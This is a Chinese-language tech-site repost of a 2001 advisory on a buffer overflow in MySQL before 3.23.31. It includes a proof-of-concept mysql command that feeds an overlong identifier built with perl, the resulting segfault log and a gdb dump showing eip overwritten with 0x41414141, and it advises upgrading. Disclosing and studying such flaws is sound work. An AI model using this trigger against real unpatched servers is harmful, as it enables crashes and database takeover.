您的位置:首页技术开发数据库安全 → MySQL3.23.31之前版本的安全漏洞

MySQL3.23.31之前版本的安全漏洞

时间:2004/12/2 1:56:00来源:本站整理作者:蓝点我要评论(0)

所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。







下面为最初发表于 MySQL 邮件列表的信件摘要。



==================================================





漏洞是由Jo?o Gouveia 于1月12日发现的:



步骤:





在第一个终端上启动 mysql:





spike:/var/mysql # /sbin/init.d/mysql start





在另外一个终端上输入:



jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’



Enter password:



(没有反应?按^C退出)





在第一台终端上会显示:





spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault



nohup



$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin



g "$@" >>$err_log 2>&1>



Number of processes running now: 0



mysqld restarted on Fri Jan 12 07:10:54 WET 2001



mysqld daemon ended





使用 gdb 显示结果如下:





(gdb) run



Starting program: /usr/sbin/mysqld



[New Thread 16897 (manager thread)]



[New Thread 16891 (initial thread)]



[New Thread 16898]



/usr/sbin/mysqld: ready for connections



[New Thread 16916]



[Switching to Thread 16916]





Program received signal SIGSEGV, Segmentation fault.



0x41414141 in ?? ()



(gdb) info all-registers



eax 0x1 1



ecx 0x68 104



edx 0x8166947 135686471



ebx 0x41414141 1094795585



esp 0xbf5ff408 0xbf5ff408



ebp 0x41414141 0x41414141



esi 0x41414141 1094795585



edi 0x0 0



eip 0x41414141 0x41414141



eflags 0x10246 66118



cs 0x23 35



ss 0x2b 43



ds 0x2b 43



es 0x2b 43



fs 0x0 0



gs 0x0 0





其中的 eip 指示就是缓冲溢出了。





解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。






相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 没有查询到任何记录。

最新文章 没有查询到任何记录。 数据库安全技术研究如何看清楚SQL注入SQL SERVER数据库口令的脆弱性MySQL不安全临时文件建立漏洞

人气排行 MySQL3.23.31之前版本的安全漏洞网站入侵过程!如何看清楚SQL注入通过mysql入侵NT和win2000Mysql数据库的安全配置、实用技巧SQL数据库的一些攻击 SQL Server补丁安装常见问题SQL SERVER数据库口令的脆弱性